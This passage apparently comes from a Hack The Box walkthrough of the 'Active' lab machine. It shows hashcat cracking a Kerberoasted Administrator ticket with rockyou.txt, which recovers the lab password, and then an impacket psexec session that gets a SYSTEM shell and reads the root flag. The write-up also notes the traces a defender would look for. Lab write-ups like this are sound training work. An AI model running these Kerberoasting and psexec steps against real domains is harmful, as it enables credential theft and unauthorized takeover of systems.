* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=2 -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=8 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=13100 -D _unroll'
Dictionary cache hit:
* Filename..: /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => s

Session..........: hashcat
Status...........: Running
Hash.Type........: Kerberos 5 TGS-REP etype 23
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~4...646388
Time.Started.....: Tue Jan 21 16:49:17 2020 (8 secs)
Time.Estimated...: Tue Jan 21 16:49:32 2020 (7 secs)
Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   911.8 kH/s (7.53ms) @ Accel:32 Loops:1 Thr:64 Vec:8
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 7798784/14344384 (54.37%)
Rejected.........: 0/7798784 (0.00%)
Restore.Point....: 7798784/14344384 (54.37%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: grega001 -> gooooal
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$66be5612a75e8b848bee009cc6f1cd3d$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:Ticketmaster1968
Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 TGS-REP etype 23
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~4...646388
Time.Started.....: Tue Jan 21 16:49:17 2020 (11 secs)
Time.Estimated...: Tue Jan 21 16:49:28 2020 (0 secs)
Guess.Base.......: File (/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   910.2 kH/s (7.47ms) @ Accel:32 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 10551296/14344384 (73.56%)
Rejected.........: 0/10551296 (0.00%)
Restore.Point....: 10534912/14344384 (73.44%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: Tiona172 -> TUGGAB8

Started: Tue Jan 21 16:49:16 2020
Stopped: Tue Jan 21 16:49:29 2020
The Administrator password is Ticketmaster1968, found in rockyou.txt after about ten seconds on a laptop CPU.
Root flag
With the Administrator password we get a SYSTEM shell on the domain controller using impacket's psexec.py. The [*] lines show how it works: it uploads a randomly named service binary to the writable ADMIN$ share, registers and starts it as a service through the Service Control Manager, and removes both again on exit, which is also exactly the trail (service creation event, binary in C:\Windows) a defender would look for.
root@kali:~/HTB/Machines/Active# ../../Utils/impacket/examples/psexec.py Administrator@active.htb
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

Password:
[*] Requesting shares on active.htb.....
[*] Found writable share ADMIN$
[*] Uploading file TkGvHmKO.exe
[*] Opening SVCManager on active.htb.....
[*] Creating service Lecg on active.htb.....
[*] Starting service Lecg.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>type root.txt
<ROOT_FLAG>

C:\Users\Administrator\Desktop>exit
[*] Process cmd.exe finished with ErrorCode: 0, ReturnCode: 0
[*] Opening SVCManager on active.htb.....
[*] Stopping service Lecg.....
[*] Removing service Lecg.....
[*] Removing file TkGvHmKO.exe.....
References
- nullinux: internal penetration testing tool for Linux that can be used to enumerate OS information, domain information, shares, directories, and users through SMB (https://github.com/m8r0wn/nullinux)
- Abusing Group Policy Preferences to elevate privileges: https://www.pentestpartners.com/security-blog/abusing-group-policy-preferences-to-elevate-privileges/
- Microsoft Open Specifications, MS-GPPREF (Group Policy: Preferences Extension Data Structure), Preferences Policy File Format, section "Password Encryption"
- Finding Passwords in SYSVOL & Exploiting Group Policy Preferences
- PowerSploit, a PowerShell post-exploitation framework (https://github.com/PowerShellMafia/PowerSploit), Get-GPPPassword.ps1
- Writing hex values to a file (not as ASCII values) via the command line
- Kerberoasting, parts 1, 2 and 3
Daniel Simao 11:43, 5 January 2020 (EST)